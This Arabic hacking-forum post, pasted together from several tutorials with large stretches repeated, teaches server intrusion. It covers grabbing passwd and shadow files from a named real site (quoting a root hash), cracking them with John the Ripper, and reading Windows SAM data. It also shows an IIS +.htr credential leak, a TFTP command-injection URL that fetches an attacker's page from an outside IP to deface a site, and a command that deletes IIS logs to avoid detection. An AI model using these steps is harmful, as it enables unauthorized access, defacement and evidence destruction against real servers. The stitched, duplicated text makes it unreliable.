adm:NP:4:4:0000-Admin(0000):/var/adm:
lp:NP:71:8:0000-lp(0000):/usr/spool/lp:
smtp:NP:0:0:mail daemon user:/:
uucp:NP:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:NP:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:*LK*:37:4:Network Admin:/usr/net/nls:
nobody:NP:60001:60001:uid no body:/:
noaccess:NP:60002:60002:uid no access:/:
----
يكون بعد كلمة root SSpbaftOt8rE6 ولكن لا تفرح كثير ا لان جميع ملفاات passwd تكون مضللة مثل
-----------------------------------------------------------------------
root:x:0:1:Super-User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin: sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer Admin:/usr/spool/lp: smtp:x:0:0:Mail Daemon User:/: uucp:x:5:5:uucp Admin:/usr/lib/uucp: nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network Admin:/usr/net/nls: nobody:x:60001:60001:Nobody:/: noaccess:x:60002:60002:No Access User:/: nobody4:x:65534:65534:SunOS 4.x Nobody:/: www:x:102:1001::/web:/bin/csh mirrors:x:102:1001::/web/mirrors:/web/mirrors/menu sid:x:103:10::/export/home/sid:/bin/ksh mirror:x:104:1::/home/mirror:/bin/sh admin:x:105:1::/home/admin:/bin/sh jerome:x:106:1::/home/jerome:/bin/sh erl:x:102:1::/home/erl:/bin/sh landmark:x:1000:1000::/web/landmark:/bin/ksn
------------
يكون بعد كلمة root x ولهذت لن اقوم بشرح فك تشفير الملف المشفر الان
سادسا: كيفية فك تشفير ملف passwd:
لن اقوم بشرح فك التشفير ملف passwd لانه وفي وقتنا الحاظر لا يوجد ملف passwd مشفر كلها مضللة ولذلك سوف اشرح ماذا تفعل اذا كان الملف مضللا
سابعا: اذا كان ملف passwd مضلل ماذا تفعل :
الان جميع ملفات passwd تكون مضللة ولكن توجد طريقة لفكه
اذا وجدت الملف مضلل يجب عليك البحث عن ملف الشادو shadow
ماهي اماكن تواجد ملف shadow في الأنظمة وهذا منقول من درس الكندور
وهذا الملف يوجد في امكنه معينه وكل نظام تشغيل له مكان يوضع به هذا الملف ، اليك الجدول التالي :
Linux : /etc/shadow token = *
SunOS : /etc/shadow token = يأخذ أشكال متعدده اشهرها هو *
FreeBSD : /etc/master.passwd or /etc/shadow token = * والجديد هو x
IRIX : /etc/shadow token = x
AIX : /etc/security/passwd token = !
ConvexOS : /etc/shadow or /etc/shadpw token = *
token تعني الرمز الذي يوجد في الملف passwd ، وهذا يفيد في تسهيل المهمه ، يعني لو مثلا لقيت علامه ! بدل كلمه المرور فهذا يعني ان كلمة المرور مسجله في /etc/security/passwd ، لقد إستعنت بالجدول السابق ذكره ، مثال على ملف شادو (أكرر ملف شادو هو الملف الذي تخزن فيه كلمة المرور الصحيحه)
ملف الشادوا تكون الكلام الذي فيه مشفر
الخظوة الأخيرة وهي دمج ملف shadow & passwd
انصحك في دمج ملف الشادو مع ملف الباس بكتابة هذا الامر في برنامج جون ذا رباير وصلة البرنامج http://packetstorm.securify.com/Crackers/john-16w.zip
انبه اولا من ان البرنامج مخصص لفك تشفير الملفات المشفرة ولكن يوجد في امر لدمج ملف الشادو مع ملف الباس وذلك لضمان عدم وقوع اخطاء عند الدمج
الامر هو unshadow passwd.txt shadow.txt
اذا لم تنج العملية وتريد تطبيقها يدويا فهي سهلة ولكن لضمان عدم وقوع اخطاء عند اللدمج فقط قم بتبديل علامة x التي تكون في ملف الباس ب اللام الموجود بدلا عنها في ملف الشادو تطبق العملية في كل علامة x تكون في ملف الباس
ثامنا : فك تشفير ملف passwd بعد دمجه مع ملف shadow:
هذا الموضوع قمت بنقله من الاخ x معاند اليهود x وهو طريقة فك تشفير ملف passwd قمت بنقل الموضوع لانه هو الكافي والوافي
الدليل الكامل لكسر كلمات السر
برنامج John the Ripper لكسر كلمات السر
تمهيد:
لاحظت خلال الفترة الماضية كثرة السؤال عن كيفية كسر كلمات السر المشفرة ووووو ، ولاني لم ارى اي شخص قد قام بشرح البرنامج شرح كافي ووافي في المنتديات (وهذه ليست مذمة لعلمي بوجود أناس خبراء به) لتكون مرجع لكل هكر عربي فإني سأقوم بشرح هذا البرنامج العظيم وبالرغم من العناصر الكثير التي سأتطرق لها إلا ان البرنامج حقيقة فيه امور كثير وكثيرة جداً وان قصرت في جانب ارجوا ان تضيفوا على الشرح حتى يستفيد الجميع ،،،
مقدمة :
برنامج (John the Ripper) احد افضل البرامج لكسر كلمات السر التي يحصل عليها المخترقون من الانظمة (nix*) ، وهذه الانظمة واخص الاصدارات الحديثة توفر نظام حماية إضافي لملف (PASSWD) بان يكون مضلل وعلى المخترق الحصول على ملف (SHADOW) لكي يحصل على ملف كلمات السر مشفرة ومن ثم يقوم بكسر هذا التشفير . هذه هي الوظيفة الاساسية واعتبرها من اهم الخطوات في اختراق الخوادم لانها تعطيك المفتاح .
مكان تنزيل البرنامج :
البرنامج متوفر في معظم المواقع وبنسخ ثلاث مايهمنا نظام التشغيل (ويندوز) لان اغلب الاخوان يعملون على هذا النظام ويمكن تنزيلة من هذا الموقع :
http://packetstorm.securify.com/Crackers/john-16w.zip
او اي موقع تحب ان تنزل البرنامج منه .
طريقة عمل البرنامج :
البرنامج يعمل على الدوس وعلى افتراض والملف الذي نقوم بتشغيلة هو (john.exe) مثال:
c:\john
ثم انتر
بيظهر لك جميع الاوامر المستخدمة في البرنامج وخلاص انتهى الشرح ،،،،،، امزح معاكم.
الخيارات المستخدمة لكسر كلمات السر المشفرة في برنامج (John the Ripper)
1- امر يبحث لك عن الكلمات المحتملة من خلال قوائم بكلمات السر
(وهذه القوائم يتم إعدادها عن طريق برامج مخصصة لذلك مثل برنامج (DICTMAKE) وبرنامج (Advanced Password Generatot) والكثير الكثير من البرامج او ان نقوم بأحضار ملفات جاهزة ومعدة للأستخدام هذا من خلال نفس الموقع الذي نزلنا منه البرنامج وهو للفائدة موقع امنى غاية في الروعة جميع ادوات الهكر والمعلومات المفيدة والدروس .
2- امر يبحث لك عن الارقام فقط مثل
(1234567890).
3- امر يبحث عن الحروف الصغيرة مثل :
(zaqwsxcderfvbgtyhn)
4- امر يبحث لك عن جميع الاحتمالات الممكنة مثل :
(smcbtdpajrhflgSkwnMBeCTRJDAPLiKovH1WGNFIVEyzuOZ20q!3984Y5xU67QX_#&(;@[^ "$%')*+,-./:<=>?\]`{|}~)
5- امر يبحث لك عن كلمات السر التي تكون مطابقة لاسم المستخدم مثل
اسم المستخدم (hex) وكلمة السر (hex)
-----------------------
1- امر يبحث لك عن الكلمات المحتملة من خلال قوائم بكلمات السر وصيغته كالتالي:
john -w:wordlist.txt passwd.txt
بحيث ان (wordlist.txt) هو ملف كلمات السر المحتملة و (passwd.txt) ملف كلمات السر الذي نريد كسره.
وعندما لايكون لدينا لاهذا ولا ذاك او ان كلمات السر المحتملة لم تكن من ضمن القوائم نلجاء إلى الطرق الاخرى
2-امر يبحث لك عن كلمات السر التي تكون مطابقة لاسم المستخدم وانا انصحك ان تبدأ بهذا الخيار لانه سريع جداً وصيغته:
john -single passwd.txt
3- امر يبحث لك عن الارقام فقط وصيغتة:
john -iigits passwd.txt
4- امر يبحث عن الحروف الصغيرة
john -i:Alpha passwd.txt
5- امر يبحث لك عن جميع الاحتمالات الممكنة وصيغتة:
john -i:all passwd.txt
هذا الامر الاخير مفيد عندما لاتنجح اي محاولة من المحاولات السابقة فهذا بيكسرها بيكسرها - بأذن الله - لانه بيجرب جميع الاحتمالات.
-----------------------------------------------------------------
طيب بقي امور لابد من أيضاحها وهي :
هناك ملف اسمة (nohn.ini) هذا من فوائدة انك تستطيع ان تحدد طول كلمة السر واطول احتمال واقصر احتمال ،عموما البرنامج اعداداته الافتراضية يبداء بخانة وينتهي بثمانية خانات تستطيع تعديل هذه الخيارات من خلال الاسطر التالية افتح الملف هناك أسطر :
[Incrementaligits]
CharCount = 10
MinLen = 1
MaxLen = 8
CharsetB = 1203984567
CharsetM = 1203947685
CharsetE = 1253079846
طيب لاحظ (MinLen = 1) اي انه يبدأ من خانة واحدة تستطيع وضعها اثنان .
لاحظ كذلك (MaxLen =
اي اقصى حد ثمانية خانات تستطيع زيادتها إنقاصها .
لكن شئ مهم عندما تعدل هذه الخيارات التي بالاعلى فلاحظ ماهو الامر التابع لها انا الان عدلت الارقام (Digits) وعرفت ذلك من خلال السطر الاول [Incrementaligits]
كذلك باقي الاوامر (All) و(Alpha) الخ ،،
---------------------------------------------
كيف تعرف ان البرنامج قام بكسر كلمات السر ??
هناك طريقتان اما انها تظهر لك في الشاشة امامك او انك تقوم بفتح ملف اسمة (john.pot) هذا ستجد كلمة السر المشفرة وكسرها .
---------------------------------------------
كيف تستطيع كذلك ملاحظة سير البرنامج؟؟
من خلال الضغط على اي زر في لوحة المفاتيح وسترى جميع التخمينات لكسر هذه الكلمات المشفرة .
----------------------------------------------
كيف تستطيع ايقاف البرنامج ؟؟
من خلال الضغط على الزر (Ctrl) و(Shift) و(C) وللفائدة اذكرها للأخوان الذين لايعلمون أغلب البرامج التي تعمل على الدوس تستطيع الخروج منها بهذه الحركة .
----------------------------------------------
هل البرنامج لايعمل إلا على كسر هذا النوع من الملفات ؟؟
لا بل يستطيع كسر اغلب كلمات السر التي تكون مشفرة لانه يستخدم شفرة (DES) وانواع اخرى حتى اني قرأت أخيراً ان البرنامج يقوم بكسر شفرة (md5) وانواع اخرى للفائدة اذكرها مثل (BSDI) .
----------------------------------------------
تاسعا: كيف استغلال الباسورد:
يمكنك استغلال باسورد الموقع في التلنت تدخل من التلنت وتفعل ماتريد
او انك تدخل من الاف تي بي وهو الأسهل والمنتشر
كيفية الدخول ب ftp يمكنك استخدام احد برامج الftp منها CuteFTP 4.2.5 Build 10.4.1 وعنوانه http://member.netease.com/~ljh11/dl/cuteftp4.z وسلامتكم
نحتاج الى وجود برنامجين ( Microsoft Access – L0phtCrack ) وهي لزوم تنفيذ بعض الخطوات لتالية وهي :-
- باسورد الادمينستيتور للسيرفر يكون موجود في ملف الـ SAM._ في دليل \winnt\repair\ وافضل برنامج لفك شفرة الباسورد هو برنامج L0phtCrack كما هو موضح بالشكل التالي:-
-اذا كان هناك مستخدمين في السيرفر ويوجد لديهم حساب فان معلوماتهم سوف تكون في ملف PASSFILT.DLL ونستطيع تحديد مسار هذا الملف من خلال الريجستري بواسطة هذا المفتاح :-
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\SYSTEM32\PASSFILT.DLL
-اذا كان السيرفر يعتمد في القراءة باستخدام صفحات الـ ASP للوصول الى البيانات من خلال قاعدة الـ MySQL فسوف نحتاج الى تطبيق ثغرة ( +.htr ) للوصول الى باسورد المسئول عن هذة القاعده وهي كالتالي :-
http://www.xxxx.com/default.asp+.htr
عند ظهور صفحة الخطا في الوصول الى الصفحة المطلوبة وبالتحديد في سيكربت التنفيذ فالطريقة صحيحة وماعلينا فقط سوى سحب ملف database.inc وقراءة محتوياته للعثور على اسم المستخدم والباسورد للمسئول عن قاعدة البيانات .
-تغيير الصفحة الرئيسية للموقع وعملية الاب لوود بواسطة برنامج TFTP .
1-قم بانشاء صفحة وضع شعارك عليها واحفظها باسم index.htm على الـ c:\
2-قم بتشغيل برنامج TFTP ونفذ الامر في الفقرة التالية .
/c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index.htm
tftp.exe وهو البرنامج اللازم لعمل الاب لوود ويجب ان يكون شغال في حالة تنفيذ الامر
"-i" وهو بمثابة باراميترز لزوم قراء البيانات في مكتبة الملفات
1.1.1.1 رقم الايبي الخاص بك
GET وهو الامر اللازم لطلب الملفات مابين الارسال والاستقبال
index.htm اسم الملف بجهازك
\inetpub\wwwroot\ اسم الدليل في السيرفر
index.htm اسم الملف على السيرفر
-مسح ملفات اللوق حتى لا يتم التعرف عليك .
وتتم هذه العملية من خلال حذف ملفات الـ Log من مجلد System32 بواسطة الامر :-
/c+del+c:/winnt/system32/logfiles/*.log
sNiper_hEx
-------------------
هذه عبارة عن اسغلال ثغرات اليونيكود
--DarK_HaCKeR-- عضو مزيون المشاركات: 47 ارسلت بتاريخ20-01-2002
ثانيا : استغلال الثغرات العادية :
الثغرات العادية تكون مثل هذه الثغرة يتم استغلالها عن طريق المتصفح http://www.mit.edu/afs/athena/system/sun4m_54/srvd/etc / هذه الثغرة في نظام ليونكس وفي مجلد etc يوجد ملف passwd المضلل + ملف shadow المشفر
خامسا: ملف passwd وما فائدته:
ملف الباسورد تكون فيه باسورد الموقع ولكنها اما ان تكون مشفرة مثل هذا /
root:SSpbaftOt8rE6:0:1:0000-Admin(0000):/:/bin/athena/tcsh
daemon:NP:1:1:0000-Admin(0000):/:
bin:NP:2:2:0000-Admin(0000):/usr/bin:
sys:NP:3:3:0000-Admin(0000):/:
adm:NP:4:4:0000-Admin(0000):/var/adm:
lp:NP:71:8:0000-lp(0000):/usr/spool/lp:
smtp:NP:0:0:mail daemon user:/:
uucp:NP:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:NP:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:*LK*:37:4:Network Admin:/usr/net/nls:
nobody:NP:60001:60001:uid no body:/:
noaccess:NP:60002:60002:uid no access:/:
----
يكون بعد كلمة root SSpbaftOt8rE6 ولكن لا تفرح كثير ا لان جميع ملفاات passwd تكون مضللة مثل
-----------------------------------------------------------------------
root:x:0:1:Super-User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin: sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer Admin:/usr/spool/lp: smtp:x:0:0:Mail Daemon User:/: uucp:x:5:5:uucp Admin:/usr/lib/uucp: nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network Admin:/usr/net/nls: nobody:x:60001:60001:Nobody:/: noaccess:x:60002:60002:No Access User:/: nobody4:x:65534:65534:SunOS 4.x Nobody:/: www:x:102:1001::/web:/bin/csh mirrors:x:102:1001::/web/mirrors:/web/mirrors/menu sid:x:103:10::/export/home/sid:/bin/ksh mirror:x:104:1::/home/mirror:/bin/sh admin:x:105:1::/home/admin:/bin/sh jerome:x:106:1::/home/jerome:/bin/sh erl:x:102:1::/home/erl:/bin/sh landmark:x:1000:1000::/web/landmark:/bin/ksn
------------
يكون بعد كلمة root x ولهذت لن اقوم بشرح فك تشفير الملف المشفر الان
سادسا: كيفية فك تشفير ملف passwd:
لن اقوم بشرح فك التشفير ملف passwd لانه وفي وقتنا الحاظر لا يوجد ملف passwd مشفر كلها مضللة ولذلك سوف اشرح ماذا تفعل اذا كان الملف مضللا
سابعا: اذا كان ملف passwd مضلل ماذا تفعل :
الان جميع ملفات passwd تكون مضللة ولكن توجد طريقة لفكه
اذا وجدت الملف مضلل يجب عليك البحث عن ملف الشادو shadow
ماهي اماكن تواجد ملف shadow في الأنظمة وهذا منقول من درس الكندور
وهذا الملف يوجد في امكنه معينه وكل نظام تشغيل له مكان يوضع به هذا الملف ، اليك الجدول التالي :
Linux : /etc/shadow token = *
SunOS : /etc/shadow token = يأخذ أشكال متعدده اشهرها هو *
FreeBSD : /etc/master.passwd or /etc/shadow token = * والجديد هو x
IRIX : /etc/shadow token = x
AIX : /etc/security/passwd token = !
ConvexOS : /etc/shadow or /etc/shadpw token = *
token تعني الرمز الذي يوجد في الملف passwd ، وهذا يفيد في تسهيل المهمه ، يعني لو مثلا لقيت علامه ! بدل كلمه المرور فهذا يعني ان كلمة المرور مسجله في /etc/security/passwd ، لقد إستعنت بالجدول السابق ذكره ، مثال على ملف شادو (أكرر ملف شادو هو الملف الذي تخزن فيه كلمة المرور الصحيحه)
ملف الشادوا تكون الكلام الذي فيه مشفر
الخظوة الأخيرة وهي دمج ملف shadow & passwd
انصحك في دمج ملف الشادو مع ملف الباس بكتابة هذا الامر في برنامج جون ذا رباير وصلة البرنامج http://packetstorm.securify.com/Crackers/john-16w.zip
انبه اولا من ان البرنامج مخصص لفك تشفير الملفات المشفرة ولكن يوجد في امر لدمج ملف الشادو مع ملف الباس وذلك لضمان عدم وقوع اخطاء عند الدمج
الامر هو unshadow passwd.txt shadow.txt
اذا لم تنج العملية وتريد تطبيقها يدويا فهي سهلة ولكن لضمان عدم وقوع اخطاء عند اللدمج فقط قم بتبديل علامة x التي تكون في ملف الباس ب اللام الموجود بدلا عنها في ملف الشادو تطبق العملية في كل علامة x تكون في ملف الباس
ثامنا : فك تشفير ملف passwd بعد دمجه مع ملف shadow:
هذا الموضوع قمت بنقله من الاخ x معاند اليهود x وهو طريقة فك تشفير ملف passwd قمت بنقل الموضوع لانه هو الكافي والوافي
الدليل الكامل لكسر كلمات السر
برنامج John the Ripper لكسر كلمات السر
تمهيد:
لاحظت خلال الفترة الماضية كثرة السؤال عن كيفية كسر كلمات السر المشفرة ووووو ، ولاني لم ارى اي شخص قد قام بشرح البرنامج شرح كافي ووافي في المنتديات (وهذه ليست مذمة لعلمي بوجود أناس خبراء به) لتكون مرجع لكل هكر عربي فإني سأقوم بشرح هذا البرنامج العظيم وبالرغم من العناصر الكثير التي سأتطرق لها إلا ان البرنامج حقيقة فيه امور كثير وكثيرة جداً وان قصرت في جانب ارجوا ان تضيفوا على الشرح حتى يستفيد الجميع ،،،
مقدمة :
برنامج (John the Ripper) احد افضل البرامج لكسر كلمات السر التي يحصل عليها المخترقون من الانظمة (nix*) ، وهذه الانظمة واخص الاصدارات الحديثة توفر نظام حماية إضافي لملف (PASSWD) بان يكون مضلل وعلى المخترق الحصول على ملف (SHADOW) لكي يحصل على ملف كلمات السر مشفرة ومن ثم يقوم بكسر هذا التشفير . هذه هي الوظيفة الاساسية واعتبرها من اهم الخطوات في اختراق الخوادم لانها تعطيك المفتاح .
مكان تنزيل البرنامج :
البرنامج متوفر في معظم المواقع وبنسخ ثلاث مايهمنا نظام التشغيل (ويندوز) لان اغلب الاخوان يعملون على هذا النظام ويمكن تنزيلة من هذا الموقع :
http://packetstorm.securify.com/Crackers/john-16w.zip
او اي موقع تحب ان تنزل البرنامج منه .
طريقة عمل البرنامج :
البرنامج يعمل على الدوس وعلى افتراض والملف الذي نقوم بتشغيلة هو (john.exe) مثال:
c:\john
ثم انتر
بيظهر لك جميع الاوامر المستخدمة في البرنامج وخلاص انتهى الشرح ،،،،،، امزح معاكم.
الخيارات المستخدمة لكسر كلمات السر المشفرة في برنامج (John the Ripper)
1- امر يبحث لك عن الكلمات المحتملة من خلال قوائم بكلمات السر
(وهذه القوائم يتم إعدادها عن طريق برامج مخصصة لذلك مثل برنامج (DICTMAKE) وبرنامج (Advanced Password Generatot) والكثير الكثير من البرامج او ان نقوم بأحضار ملفات جاهزة ومعدة للأستخدام هذا من خلال نفس الموقع الذي نزلنا منه البرنامج وهو للفائدة موقع امنى غاية في الروعة جميع ادوات الهكر والمعلومات المفيدة والدروس .
2- امر يبحث لك عن الارقام فقط مثل
(1234567890).
3- امر يبحث عن الحروف الصغيرة مثل :
(zaqwsxcderfvbgtyhn)
4- امر يبحث لك عن جميع الاحتمالات الممكنة مثل :
(smcbtdpajrhflgSkwnMBeCTRJDAPLiKovH1WGNFIVEyzuOZ20q!3984Y5xU67QX_#&(;@[^ "$%')*+,-./:<=>?\]`{|}~)
5- امر يبحث لك عن كلمات السر التي تكون مطابقة لاسم المستخدم مثل
اسم المستخدم (hex) وكلمة السر (hex)
-----------------------
1- امر يبحث لك عن الكلمات المحتملة من خلال قوائم بكلمات السر وصيغته كالتالي:
john -w:wordlist.txt passwd.txt
بحيث ان (wordlist.txt) هو ملف كلمات السر المحتملة و (passwd.txt) ملف كلمات السر الذي نريد كسره.
وعندما لايكون لدينا لاهذا ولا ذاك او ان كلمات السر المحتملة لم تكن من ضمن القوائم نلجاء إلى الطرق الاخرى
2-امر يبحث لك عن كلمات السر التي تكون مطابقة لاسم المستخدم وانا انصحك ان تبدأ بهذا الخيار لانه سريع جداً وصيغته:
john -single passwd.txt
3- امر يبحث لك عن الارقام فقط وصيغتة:
john -iigits passwd.txt
4- امر يبحث عن الحروف الصغيرة
john -i:Alpha passwd.txt
5- امر يبحث لك عن جميع الاحتمالات الممكنة وصيغتة:
john -i:all passwd.txt
هذا الامر الاخير مفيد عندما لاتنجح اي محاولة من المحاولات السابقة فهذا بيكسرها بيكسرها - بأذن الله - لانه بيجرب جميع الاحتمالات.
-----------------------------------------------------------------
طيب بقي امور لابد من أيضاحها وهي :
هناك ملف اسمة (nohn.ini) هذا من فوائدة انك تستطيع ان تحدد طول كلمة السر واطول احتمال واقصر احتمال ،عموما البرنامج اعداداته الافتراضية يبداء بخانة وينتهي بثمانية خانات تستطيع تعديل هذه الخيارات من خلال الاسطر التالية افتح الملف هناك أسطر :
[Incrementaligits]
CharCount = 10
MinLen = 1
MaxLen = 8
CharsetB = 1203984567
CharsetM = 1203947685
CharsetE = 1253079846
طيب لاحظ (MinLen = 1) اي انه يبدأ من خانة واحدة تستطيع وضعها اثنان .
لاحظ كذلك (MaxLen =
اي اقصى حد ثمانية خانات تستطيع زيادتها إنقاصها . لكن شئ مهم عندما تعدل هذه الخيارات التي بالاعلى فلاحظ ماهو الامر التابع لها انا الان عدلت الارقام (Digits) وعرفت ذلك من خلال السطر الاول [Incrementaligits]
كذلك باقي الاوامر (All) و(Alpha) الخ ،،
---------------------------------------------
كيف تعرف ان البرنامج قام بكسر كلمات السر ??
هناك طريقتان اما انها تظهر لك في الشاشة امامك او انك تقوم بفتح ملف اسمة (john.pot) هذا ستجد كلمة السر المشفرة وكسرها .
---------------------------------------------
كيف تستطيع كذلك ملاحظة سير البرنامج؟؟
من خلال الضغط على اي زر في لوحة المفاتيح وسترى جميع التخمينات لكسر هذه الكلمات المشفرة .
----------------------------------------------
كيف تستطيع ايقاف البرنامج ؟؟
من خلال الضغط على الزر (Ctrl) و(Shift) و(C) وللفائدة اذكرها للأخوان الذين لايعلمون أغلب البرامج التي تعمل على الدوس تستطيع الخروج منها بهذه الحركة .
----------------------------------------------
هل البرنامج لايعمل إلا على كسر هذا النوع من الملفات ؟؟
لا بل يستطيع كسر اغلب كلمات السر التي تكون مشفرة لانه يستخدم شفرة (DES) وانواع اخرى حتى اني قرأت أخيراً ان البرنامج يقوم بكسر شفرة (md5) وانواع اخرى للفائدة اذكرها مثل (BSDI) .
----------------------------------------------
تاسعا: كيف استغلال الباسورد:
يمكنك استغلال باسورد الموقع في التلنت تدخل من التلنت وتفعل ماتريد
او انك تدخل من الاف تي بي وهو الأسهل والمنتشر
كيفية الدخول ب ftp يمكنك استخدام احد برامج الftp منها CuteFTP 4.2.5 Build 10.4.1 وعنوانه http://member.netease.com/~ljh11/dl/cuteftp4.z وسلامتكم
Hacker- عدد المساهمات : 49
تاريخ التسجيل : 11/08/2007
العمر : 34
الموقع : www.v99x.com -
مواضيع مماثلةصفحة 1 من اصل 1
صلاحيات هذا المنتدى:
لاتستطيع الرد على المواضيع في هذا المنتدى